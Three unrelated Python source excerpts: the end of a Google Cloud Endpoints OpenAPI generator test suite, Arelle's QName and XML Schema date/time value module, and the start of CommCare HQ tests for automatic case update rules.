'/root/v1/process': {
'post': {
'operationId': 'MyService_entriesProcess',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/roundtrip': {
'post': {
'operationId': 'MyService_entriesRoundtrip',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
'schema': {
'$ref': self._def_path(all_fields)
},
},
},
},
},
},
'definitions': {
all_fields: {
'type': 'object',
'properties': {
'bool_value': {
'type': 'boolean',
},
'bytes_value': {
'type': 'string',
'format': 'byte',
},
'datetime_value': {
'type': 'string',
'format': 'date-time',
},
'double_value': {
'type': 'number',
'format': 'double',
},
'enum_value': {
'type': 'string',
'enum': [
'VAL1',
'VAL2',
],
},
'float_value': {
'type': 'number',
'format': 'float',
},
'int32_value': {
'type': 'integer',
'format': 'int32',
},
'int64_value': {
'type': 'string',
'format': 'int64',
},
'message_field_value': {
'$ref': self._def_path(nested),
'description':
'Message class to be used in a message field.',
},
'sint32_value': {
'type': 'integer',
'format': 'int32',
},
'sint64_value': {
'type': 'string',
'format': 'int64',
},
'string_value': {
'type': 'string',
},
'uint32_value': {
'type': 'integer',
'format': 'uint32',
},
'uint64_value': {
'type': 'string',
'format': 'uint64',
},
},
},
boolean_response: {
'type': 'object',
'properties': {
'result': {
'type': 'boolean',
},
},
'required': ['result'],
},
entry_publish_request: {
'type': 'object',
'properties': {
'entryId': {
'type': 'string',
},
'title': {
'type': 'string',
},
},
'required': [
'entryId',
'title',
]
},
publish_request_for_container: {
'type': 'object',
'properties': {
'title': {
'type': 'string',
},
},
'required': [
'title',
]
},
items_put_request: {
'type': 'object',
'properties': {
'body': {
'$ref': self._def_path(all_fields),
'description': 'Contains all field types.'
},
'entryId': {
'type': 'string',
},
},
'required': [
'entryId',
]
},
nested: {
'type': 'object',
'properties': {
'int_value': {
'type': 'string',
'format': 'int64',
},
'string_value': {
'type': 'string',
},
},
},
put_request: {
'type': 'object',
'properties': {
'body': {
'$ref': self._def_path(all_fields),
'description': 'Contains all field types.',
},
},
},
put_request_for_container: {
'type': 'object',
'properties': {
'body': {
'$ref': self._def_path(all_fields),
'description': 'Contains all field types.',
},
},
},
},
'securityDefinitions': {
'google_id_token': {
'authorizationUrl': '',
'flow': 'implicit',
'type': 'oauth2',
'x-issuer': 'accounts.google.com',
'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
},
},
}
test_util.AssertDictEqual(expected_openapi, api, self)
def testLocalhost(self):
@api_config.api(name='root', hostname='localhost:8080', version='v1')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
path='noop', http_method='GET', name='noop')
def noop_get(self, unused_request):
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
expected_openapi = {
'swagger': '2.0',
'info': {
'title': 'root',
'description': 'Describes MyService.',
'version': 'v1',
},
'host': 'localhost:8080',
'consumes': ['application/json'],
'produces': ['application/json'],
'schemes': ['http'],
'basePath': '/_ah/api',
'paths': {
'/root/v1/noop': {
'get': {
'operationId': 'MyService_noopGet',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
},
'securityDefinitions': {
'google_id_token': {
'authorizationUrl': '',
'flow': 'implicit',
'type': 'oauth2',
'x-issuer': 'accounts.google.com',
'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
},
},
}
test_util.AssertDictEqual(expected_openapi, api, self)
def testApiKeyRequired(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
api_key_required=True)
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
path='noop', http_method='GET', name='noop')
def noop_get(self, unused_request):
return message_types.VoidMessage()
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
path='override', http_method='GET', name='override',
api_key_required=False)
def override_get(self, unused_request):
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
expected_openapi = {
'swagger': '2.0',
'info': {
'title': 'root',
'description': 'Describes MyService.',
'version': 'v1',
},
'host': 'example.appspot.com',
'consumes': ['application/json'],
'produces': ['application/json'],
'schemes': ['https'],
'basePath': '/_ah/api',
'paths': {
'/root/v1/noop': {
'get': {
'operationId': 'MyService_noopGet',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
'security': [
{
'api_key': [],
}
],
},
},
'/root/v1/override': {
'get': {
'operationId': 'MyService_overrideGet',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
},
'securityDefinitions': {
'google_id_token': {
'authorizationUrl': '',
'flow': 'implicit',
'type': 'oauth2',
'x-issuer': 'accounts.google.com',
'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
},
'api_key': {
'type': 'apiKey',
'name': 'key',
'in': 'query',
},
},
}
test_util.AssertDictEqual(expected_openapi, api, self)
def testCustomUrl(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
base_path='/my/base/path/')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
path='noop', http_method='GET', name='noop')
def noop_get(self, unused_request):
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
expected_openapi = {
'swagger': '2.0',
'info': {
'title': 'root',
'description': 'Describes MyService.',
'version': 'v1',
},
'host': 'example.appspot.com',
'consumes': ['application/json'],
'produces': ['application/json'],
'schemes': ['https'],
'basePath': '/my/base/path',
'paths': {
'/root/v1/noop': {
'get': {
'operationId': 'MyService_noopGet',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
},
'securityDefinitions': {
'google_id_token': {
'authorizationUrl': '',
'flow': 'implicit',
'type': 'oauth2',
'x-issuer': 'accounts.google.com',
'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
},
},
}
test_util.AssertDictEqual(expected_openapi, api, self)
class DevServerOpenApiGeneratorTest(BaseOpenApiGeneratorTest,
test_util.DevServerTest):
def setUp(self):
super(DevServerOpenApiGeneratorTest, self).setUp()
self.env_key, self.orig_env_value = (test_util.DevServerTest.
setUpDevServerEnv())
self.addCleanup(test_util.DevServerTest.restoreEnv,
self.env_key, self.orig_env_value)
def testDevServerOpenApi(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
path='noop', http_method='GET', name='noop')
def noop_get(self, unused_request):
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
expected_openapi = {
'swagger': '2.0',
'info': {
'title': 'root',
'description': 'Describes MyService.',
'version': 'v1',
},
'host': 'example.appspot.com',
'consumes': ['application/json'],
'produces': ['application/json'],
'schemes': ['http'],
'basePath': '/_ah/api',
'paths': {
'/root/v1/noop': {
'get': {
'operationId': 'MyService_noopGet',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
},
'securityDefinitions': {
'google_id_token': {
'authorizationUrl': '',
'flow': 'implicit',
'type': 'oauth2',
'x-issuer': 'accounts.google.com',
'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
},
},
}
test_util.AssertDictEqual(expected_openapi, api, self)
if __name__ == '__main__':
unittest.main()
| |
u'''
Created on Jan 4, 2011
@author: Mark V Systems Limited
(c) Copyright 2011 Mark V Systems Limited, All rights reserved.
'''
from __future__ import division
import copy, datetime
try:
import regex as re
except ImportError:
import re
XmlUtil = None
def qname(value, name=None, noPrefixIsNoNamespace=False, castException=None, prefixException=None):
# either value can be an etree ModelObject element: if no name then qname is element tag quanem
# if name provided qname uses element as xmlns reference and name as prefixed name
# value can be namespaceURI and name is localname or prefix:localname
# value can be prefix:localname (and localname omitted)
# for xpath qnames which do not take default namespace if no prefix, specify noPrefixIsNoNamespace
if isinstance(value, ModelObject):
if name: # name is prefixed name
element = value # may be an attribute
value = name
name = None
else:
return QName(value.prefix, value.namespaceURI, value.localName)
elif isinstance(name, ModelObject):
element = name
name = None
element = None
value = name
else:
element = None
if isinstance(value,QName):
return value
elif not isinstance(value,_STR_BASE):
if castException: raise castException
return None
if value and value[0] == u'{': # clark notation (with optional prefix)
namespaceURI,sep,prefixedLocalName = value[1:].rpartition(u'}')
prefix,sep,localName = prefixedLocalName.rpartition(u':')
if not sep:
prefix = None
namespaceDict = None
else:
if isinstance(name, dict):
namespaceURI = None
namespaceDict = name # note that default prefix must be None, not '', in dict
elif name is not None:
if name: # len > 0
namespaceURI = value
else:
namespaceURI = None
namespaceDict = None
value = name
else:
namespaceURI = None
namespaceDict = None
prefix,sep,localName = value.strip().rpartition(u":") # must be whitespace collapsed
if not prefix:
prefix = None # don't want '' but instead None if no prefix
if noPrefixIsNoNamespace:
return QName(None, None, localName)
if namespaceURI:
return QName(prefix, namespaceURI, localName)
elif namespaceDict and prefix in namespaceDict:
return QName(prefix, namespaceDict[prefix], localName)
elif element is not None:
# same as XmlUtil.xmlns but local for efficiency
namespaceURI = element.nsmap.get(prefix)
if not namespaceURI and prefix == u'xml':
namespaceURI = u"http://www.w3.org/XML/1998/namespace"
if not namespaceURI:
if prefix:
if prefixException: raise prefixException
return None # error, prefix not found
namespaceURI = None # cancel namespace if it is a zero length string
return QName(prefix, namespaceURI, localName)
def qnameNsLocalName(namespaceURI, localName): # does not handle localNames with prefix
return QName(None, namespaceURI or None, localName)
def qnameClarkName(clarkname): # does not handle clark names with prefix
if clarkname and clarkname[0] == u'{': # clark notation (with optional prefix)
namespaceURI,sep,localName = clarkname[1:].rpartition(u'}')
return QName(None, namespaceURI or None, localName)
else:
return QName(None, None, clarkname)
def qnameEltPfxName(element, prefixedName, prefixException=None):
prefix,sep,localName = prefixedName.rpartition(u':')
if not prefix:
prefix = None # don't want '' but instead None if no prefix
namespaceURI = element.nsmap.get(prefix)
if not namespaceURI:
if prefix:
if prefix == u'xml':
namespaceURI = u"http://www.w3.org/XML/1998/namespace"
else:
if prefixException: raise prefixException
return None
else:
namespaceURI = None # cancel namespace if it is a zero length string
return QName(prefix, namespaceURI, localName)
class QName(object):
__slots__ = (u"prefix", u"namespaceURI", u"localName", u"qnameValueHash")
def __init__(self,prefix,namespaceURI,localName):
self.prefix = prefix
self.namespaceURI = namespaceURI
self.localName = localName
self.qnameValueHash = hash( (namespaceURI, localName) )
def __hash__(self):
return self.qnameValueHash
@property
def clarkNotation(self):
if self.namespaceURI:
return u'{{{0}}}{1}'.format(self.namespaceURI, self.localName)
else:
return self.localName
def __repr__(self):
return self.__str__()
def __str__(self):
if self.prefix and self.prefix != u'':
return self.prefix + u':' + self.localName
else:
return self.localName
def __eq__(self,other):
try:
return (self.qnameValueHash == other.qnameValueHash and
self.localName == other.localName and self.namespaceURI == other.namespaceURI)
except AttributeError:
return False
u''' don't think this is used any longer
if isinstance(other,_STR_BASE):
# only compare nsnames {namespace}localname format, if other has same hash
return self.__hash__() == other.__hash__() and self.clarkNotation == other
elif isinstance(other,QName):
return self.qnameValueHash == other.qnameValueHash and \
self.namespaceURI == other.namespaceURI and self.localName == other.localName
elif isinstance(other,ModelObject):
return self.namespaceURI == other.namespaceURI and self.localName == other.localName
'''
u'''
try:
return (self.qnameValueHash == other.qnameValueHash and
self.namespaceURI == other.namespaceURI and self.localName == other.localName)
except AttributeError: # other may be a model object and not a QName
try:
return self.namespaceURI == other.namespaceURI and self.localName == other.localName
except AttributeError:
return False
return False
'''
def __ne__(self,other):
return not self.__eq__(other)
def __lt__(self,other):
return (self.namespaceURI is None and other.namespaceURI) or \
(self.namespaceURI and other.namespaceURI and self.namespaceURI < other.namespaceURI) or \
(self.namespaceURI == other.namespaceURI and self.localName < other.localName)
def __le__(self,other):
return (self.namespaceURI is None and other.namespaceURI) or \
(self.namespaceURI and other.namespaceURI and self.namespaceURI < other.namespaceURI) or \
(self.namespaceURI == other.namespaceURI and self.localName <= other.localName)
def __gt__(self,other):
return (self.namespaceURI and other.namespaceURI is None) or \
(self.namespaceURI and other.namespaceURI and self.namespaceURI > other.namespaceURI) or \
(self.namespaceURI == other.namespaceURI and self.localName > other.localName)
def __ge__(self,other):
return (self.namespaceURI and other.namespaceURI is None) or \
(self.namespaceURI and other.namespaceURI and self.namespaceURI > other.namespaceURI) or \
(self.namespaceURI == other.namespaceURI and self.localName >= other.localName)
from arelle.ModelObject import ModelObject
def anyURI(value):
return AnyURI(value)
class AnyURI(unicode):
def __new__(cls, value):
return unicode.__new__(cls, value)
datetimePattern = re.compile(ur"\s*([0-9]{4})-([0-9]{2})-([0-9]{2})[T ]([0-9]{2}):([0-9]{2}):([0-9]{2})\s*|"
ur"\s*([0-9]{4})-([0-9]{2})-([0-9]{2})\s*")
timePattern = re.compile(ur"\s*([0-9]{2}):([0-9]{2}):([0-9]{2})\s*")
durationPattern = re.compile(ur"\s*(-?)P((-?[0-9]+)Y)?((-?[0-9]+)M)?((-?[0-9]+)D)?(T((-?[0-9]+)H)?((-?[0-9]+)M)?((-?[0-9.]+)S)?)?\s*")
DATE = 1
DATETIME = 2
DATEUNION = 3
def dateTime(value, time=None, addOneDay=None, type=None, castException=None):
if value == u"MinDate":
return DateTime(datetime.MINYEAR,1,1)
elif value == u"maxyear":
return DateTime(datetime.MAXYEAR,12,31)
elif isinstance(value, ModelObject):
value = value.text
elif isinstance(value, DateTime) and not addOneDay and (value.dateOnly == (type == DATE)):
return value # no change needed for cast or conversion
elif isinstance(value, datetime.datetime):
if type == DATE:
dateOnly = True
elif type == DATETIME:
dateOnly = False
else:
dateOnly = isinstance(value, DateTime) and value.dateOnly
if addOneDay and not dateOnly:
addOneDay = False
return DateTime(value.year, value.month, value.day, value.hour, value.minute, value.second, value.microsecond, tzinfo=value.tzinfo, dateOnly=dateOnly, addOneDay=addOneDay)
elif isinstance(value, datetime.date):
return DateTime(value.year, value.month, value.day,dateOnly=True,addOneDay=addOneDay)
elif castException and not isinstance(value, _STR_BASE):
raise castException(u"not a string value")
if value is None:
return None
match = datetimePattern.match(value.strip())
if match is None:
if castException:
raise castException(u"lexical pattern mismatch")
return None
if match.lastindex == 6:
if type == DATE:
if castException:
raise castException(u"date-only object has too many fields or contains time")
return None
result = DateTime(int(match.group(1)),int(match.group(2)),int(match.group(3)),int(match.group(4)),int(match.group(5)),int(match.group(6)), dateOnly=False)
else:
if type == DATE or type == DATEUNION:
dateOnly = True
elif type == DATETIME:
dateOnly = False
else:
dateOnly = False
result = DateTime(int(match.group(7)),int(match.group(8)),int(match.group(9)),dateOnly=dateOnly,addOneDay=addOneDay)
return result
def lastDayOfMonth(year, month):
if month in (1,3,5,7,8,10,12): return 31
if month in (4,6,9,11): return 30
if year % 400 == 0 or (year % 100 != 0 and year % 4 == 0): return 29
return 28
#!!! see note in XmlUtil.py datetimeValue, may need exceptions handled or special treatment for end time of 9999-12-31
class DateTime(datetime.datetime):
def __new__(cls, y, m, d, hr=0, min=0, sec=0, microsec=0, tzinfo=None, dateOnly=None, addOneDay=None):
lastDay = lastDayOfMonth(y, m)
# check day and month before adjustment
if not 1 <= m <= 12: raise ValueError(u"month must be in 1..12")
if not 1 <= d <= lastDay: raise ValueError(u"day is out of range for month")
if hr == 24:
if min != 0 or sec != 0 or microsec != 0: raise ValueError(u"hour 24 must have 0 mins and secs.")
hr = 0
d += 1
if addOneDay:
d += 1
if d > lastDay: d -= lastDay; m += 1
if m > 12: m = 1; y += 1
dateTime = datetime.datetime.__new__(cls, y, m, d, hr, min, sec, microsec, tzinfo)
dateTime.dateOnly = dateOnly
return dateTime
def __copy__(self):
return DateTime(self.year, self.month, self.day, self.hour, self.minute, self.second, self.microsecond, self.tzinfo, self.dateOnly)
def __str__(self):
if self.dateOnly:
return u"{0.year:04}-{0.month:02}-{0.day:02}".format(self)
else:
return u"{0.year:04}-{0.month:02}-{0.day:02}T{0.hour:02}:{0.minute:02}:{0.second:02}".format(self)
def addYearMonthDuration(self, other, sign):
m = self.month + sign * other.months
y = self.year + sign * other.years + m // 12
m %= 12
d = self.day
lastDay = lastDayOfMonth(y, m)
if d > lastDay: d = lastDay
return DateTime(y, m, d, self.hour, self.minute, self.second, self.microsecond, self.tzinfo, self.dateOnly)
def __add__(self, other):
if isinstance(other, YearMonthDuration):
return self.addYearMonthDuration(other, 1)
else:
if isinstance(other, Time): other = dayTimeDuration(other)
dt = super(DateTime, self).__add__(other)
return DateTime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo, self.dateOnly)
def __sub__(self, other):
if isinstance(other, YearMonthDuration):
return self.addYearMonthDuration(other, -1)
else:
dt = super(DateTime, self).__sub__(other)
if isinstance(dt,datetime.timedelta):
return DayTimeDuration(dt.days, 0, 0, dt.seconds)
else:
if isinstance(other, Time): other = dayTimeDuration(other)
return DateTime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo, self.dateOnly)
def dateUnionEqual(dateUnion1, dateUnion2, instantEndDate=False):
if isinstance(dateUnion1,DateTime):
if instantEndDate and dateUnion1.dateOnly:
dateUnion1 += datetime.timedelta(1)
elif isinstance(dateUnion1,datetime.date):
dateUnion1 = dateTime(dateUnion1, addOneDay=instantEndDate)
if isinstance(dateUnion2,DateTime):
if instantEndDate and dateUnion2.dateOnly:
dateUnion2 += datetime.timedelta(1)
elif isinstance(dateUnion2,datetime.date):
dateUnion2 = dateTime(dateUnion2, addOneDay=instantEndDate)
return dateUnion1 == dateUnion2
def dateunionDate(datetimeValue, subtractOneDay=False):
isDate = (hasattr(datetimeValue,u'dateOnly') and datetimeValue.dateOnly) or not hasattr(datetimeValue, u'hour')
d = datetimeValue
if isDate or (d.hour == 0 and d.minute == 0 and d.second == 0):
if subtractOneDay and not isDate: d -= datetime.timedelta(1)
return datetime.date(d.year, d.month, d.day)
def yearMonthDuration(value):
minus, hasYr, yrs, hasMo, mos, hasDay, days, hasTime, hasHr, hrs, hasMin, mins, hasSec, secs = durationPattern.match(value).groups()
if hasDay or hasHr or hasMin or hasSec: raise ValueError
sign = -1 if minus else 1
return YearMonthDuration(sign * int(yrs if yrs else 0), sign * int(mos if mos else 0))
class YearMonthDuration():
def __init__(self, years, months):
self.years = years
self.months = months
def __repr__(self):
return u"P{0}Y{1}M".format(self.years, self.months)
def dayTimeDuration(value):
if isinstance(value,Time):
return DayTimeDuration(1 if value.hour24 else 0, value.hour, value.minute, value.second)
minus, hasYr, yrs, hasMo, mos, hasDay, days, hasTime, hasHr, hrs, hasMin, mins, hasSec, secs = durationPattern.match(value).groups()
if hasYr or hasMo: raise ValueError
sign = -1 if minus else 1
return DayTimeDuration(sign * int(days if days else 0), sign * int(hrs if hrs else 0), sign * int(mins if mins else 0), sign * int(secs if secs else 0))
class DayTimeDuration(datetime.timedelta):
def __new__(cls, days, hours, minutes, seconds):
dyTm = datetime.timedelta.__new__(cls,days,hours,minutes,seconds)
return dyTm
def dayHrsMinsSecs(self):
days = int(self.days)
if days < 0 and (self.seconds > 0 or self.microseconds > 0):
days -= 1
seconds = 86400 - self.seconds
if seconds > 0 and self.microseconds > 0:
microseconds = 1000000 - self.microseconds
seconds -= 1
elif self.microseconds > 0:
microseconds = 1000000 - self.microseconds
else:
seconds = self.seconds
microseconds = self.microseconds
# round up microseconds
if microseconds >= 500000:
seconds += 1
hours = int(seconds / 86400 )
if hours > 24:
days += hours / 24
hours = hours % 24
seconds -= hours * 86400
minutes = int(seconds / 60)
seconds -= minutes * 60
return (days, hours, minutes, seconds)
def __repr__(self):
x = self.dayHrsMinsSecs
return u"P{0}DT{1}H{2}M{3}S".format(x[0], x[1], x[2], x[3])
def time(value, castException=None):
if value == u"MinTime":
return Time(time.min)
elif value == u"MaxTime":
return Time(time.max)
elif isinstance(value, ModelObject):
value = value.text
elif isinstance(value, datetime.time):
return Time(value.hour, value.minute, value.second, value.microsecond, value.tzinfo)
elif isinstance(value, datetime.datetime):
return Time(value.hour, value.minute, value.second, value.microsecond, value.tzinfo)
elif castException and not isinstance(value, _STR_BASE):
raise castException
if value is None:
return None
match = timePattern.match(value.strip())
if match is None:
return None
return Time(int(match.group(1)),int(match.group(2)),int(match.group(3)))
class Time(datetime.time):
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
hour24 = (hour == 24 and minute == 0 and second == 0 and microsecond == 0)
if hour24: hour = 0
time = datetime.time.__new__(cls, hour, minute, second, microsecond, tzinfo)
time.hour24 = hour24
return time
class gYearMonth():
def __init__(self, year, month):
self.year = int(year)
self.month = int(month)
def __repr__(self):
return u"-{0}-{1}".format(self.year, self.month)
class gMonthDay():
def __init__(self, month, day):
self.month = int(month)
self.day = int(day)
def __repr__(self):
return u"--{0}-{1}".format(self.month, self.day)
class gYear():
def __init__(self, year):
self.year = int(year)
def __repr__(self):
return u"{0}".format(self.year)
class gMonth():
def __init__(self, month):
self.month = int(month)
def __repr__(self):
return u"--{0}".format(self.month)
class gDay():
def __init__(self, day):
self.day = int(day)
def __repr__(self):
return u"---{0}".format(self.day)
class InvalidValue(unicode):
def __new__(cls, value):
return unicode.__new__(cls, value)
INVALIDixVALUE = InvalidValue(u"(ixTransformValueError)")
| |
from contextlib import contextmanager
from casexml.apps.case.mock import CaseFactory
from casexml.apps.case.models import CommCareCase
from casexml.apps.case.signals import case_post_save
from corehq.apps.data_interfaces.models import (AutomaticUpdateRule,
AutomaticUpdateRuleCriteria,
AutomaticUpdateAction, AUTO_UPDATE_XMLNS)
from corehq.apps.data_interfaces.tasks import run_case_update_rules_for_domain
from datetime import datetime, date
from corehq.form_processor.backends.sql.dbaccessors import CaseAccessorSQL
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
from corehq.form_processor.tests.utils import (run_with_all_backends, FormProcessorTestUtils,
set_case_property_directly)
from corehq.form_processor.utils.general import should_use_sql_backend
from corehq.form_processor.signals import sql_case_post_save
from corehq.util.test_utils import set_parent_case as set_actual_parent_case, update_case
from django.test import TestCase
from mock import patch
from corehq.util.context_managers import drop_connected_signals
from toggle.shortcuts import update_toggle_cache
from corehq.toggles import NAMESPACE_DOMAIN, AUTO_CASE_UPDATE_ENHANCEMENTS, RUN_AUTO_CASE_UPDATES_ON_SAVE
from corehq.apps import hqcase
class AutomaticCaseUpdateTest(TestCase):
def setUp(self):
super(AutomaticCaseUpdateTest, self).setUp()
self.domain = 'auto-update-test'
update_toggle_cache(AUTO_CASE_UPDATE_ENHANCEMENTS.slug, self.domain, True, NAMESPACE_DOMAIN)
update_toggle_cache(RUN_AUTO_CASE_UPDATES_ON_SAVE.slug, self.domain, True, NAMESPACE_DOMAIN)
self.case_db = CaseAccessors(self.domain)
self.factory = CaseFactory(self.domain)
self.rule = AutomaticUpdateRule(
domain=self.domain,
name='test-rule',
case_type='test-case-type',
active=True,
server_modified_boundary=30,
)
self.rule.save()
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
rule=self.rule,
)
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_UPDATE,
property_name='update_flag',
property_value='Y',
rule=self.rule,
)
self.rule2 = AutomaticUpdateRule(
domain=self.domain,
name='test-rule-2',
case_type='test-case-type-2',
active=True,
server_modified_boundary=30,
)
self.rule2.save()
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_CLOSE,
rule=self.rule2,
)
self.rule3 = AutomaticUpdateRule(
domain=self.domain,
name='test-rule-3',
case_type='test-case-type-2',
active=True,
server_modified_boundary=50,
)
self.rule3.save()
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_CLOSE,
rule=self.rule3,
)
self.rule4 = AutomaticUpdateRule(
domain=self.domain,
name='test-rule-4',
case_type='test-case-type',
active=True,
server_modified_boundary=30,
)
self.rule4.save()
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='40',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
rule=self.rule4,
)
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_UPDATE,
property_name='update_flag',
property_value='C',
rule=self.rule4,
)
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_CLOSE,
rule=self.rule4,
)
self.rule5 = AutomaticUpdateRule(
domain=self.domain,
name='test-rule-5',
case_type='test-case-type-3',
active=True,
filter_on_server_modified=False
)
self.rule5.save()
AutomaticUpdateRuleCriteria.objects.create(
property_name='name',
property_value='signal',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule5,
)
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_UPDATE,
property_name='after_save',
property_value='updated',
rule=self.rule5,
)
with drop_connected_signals(case_post_save):
case = self.factory.create_case(case_type='test-case-type')
self.case_id = case.case_id
def tearDown(self):
AutomaticUpdateRuleCriteria.objects.all().delete()
AutomaticUpdateAction.objects.all().delete()
AutomaticUpdateRule.objects.all().delete()
FormProcessorTestUtils.delete_all_cases(self.domain)
super(AutomaticCaseUpdateTest, self).tearDown()
def _get_case_ids(self, *args, **kwargs):
return [self.case_id]
def _get_case(self):
return self.case_db.get_case(self.case_id)
def _assert_case_revision(self, rev_number, last_modified, expect_modified=False):
if should_use_sql_backend(self.domain):
self.assertEqual(
expect_modified,
CaseAccessorSQL.case_modified_since(self.case_id, last_modified)
)
else:
doc = self._get_case()
self.assertTrue(doc['_rev'].startswith('%s-' % rev_number))
@run_with_all_backends
def test_rule(self):
now = datetime(2015, 10, 22, 0, 0)
with patch('corehq.apps.data_interfaces.models.AutomaticUpdateRule.get_case_ids', new=self._get_case_ids):
# No update: both dates are 27 days away
last_modified = datetime(2015, 9, 25, 12, 0)
_update_case(self.domain, self.case_id, last_modified, date(2015, 9, 25))
self._assert_case_revision(2, last_modified)
run_case_update_rules_for_domain(self.domain, now=now)
self._assert_case_revision(2, last_modified)
# No update: server_modified_on is 32 days away but last_visit_date is 27 days away
last_modified = datetime(2015, 9, 20, 12, 0)
_update_case(self.domain, self.case_id, last_modified, date(2015, 9, 25))
self._assert_case_revision(3, last_modified)
run_case_update_rules_for_domain(self.domain, now=now)
self._assert_case_revision(3, last_modified)
# No update: last_visit_date is 32 days away but server_modified_on is 27 days away
last_modified = datetime(2015, 9, 25, 12, 0)
_update_case(self.domain, self.case_id, last_modified, date(2015, 9, 20))
self._assert_case_revision(4, last_modified)
run_case_update_rules_for_domain(self.domain, now=now)
self._assert_case_revision(4, last_modified)
# Perform update: both dates are 32 days away
last_modified = datetime(2015, 9, 20, 12, 0)
_update_case(self.domain, self.case_id, last_modified, date(2015, 9, 20))
self._assert_case_revision(5, last_modified)
with drop_connected_signals(case_post_save):
run_case_update_rules_for_domain(self.domain, now=now)
self._assert_case_revision(6, last_modified, True)
case = self._get_case()
self.assertEqual(case.get_case_property('update_flag'), 'Y')
# No update: case state matches final state
_update_case(self.domain, self.case_id, last_modified, date(2015, 9, 20))
self._assert_case_revision(7, last_modified)
with drop_connected_signals(case_post_save):
run_case_update_rules_for_domain(self.domain, now=now)
self._assert_case_revision(7, last_modified)
# Perform update: case closed because date is 42 days away
_update_case(self.domain, self.case_id, last_modified, date(2015, 9, 10))
with drop_connected_signals(case_post_save):
run_case_update_rules_for_domain(self.domain, now=now)
case = self._get_case()
self.assertEqual(case.get_case_property('update_flag'), 'C')
self.assertEqual(case.closed, True)
@run_with_all_backends
def test_match_days_after(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
rule=self.rule2,
)
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-30')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-03')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-02')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-11-01')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_days_before(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_BEFORE,
rule=self.rule2,
)
# When the case property doesn't exist, it should not match
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-10-01')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-01-02')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-01-31')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-02-01')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-03-01')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_equal(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='value1',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule2,
)
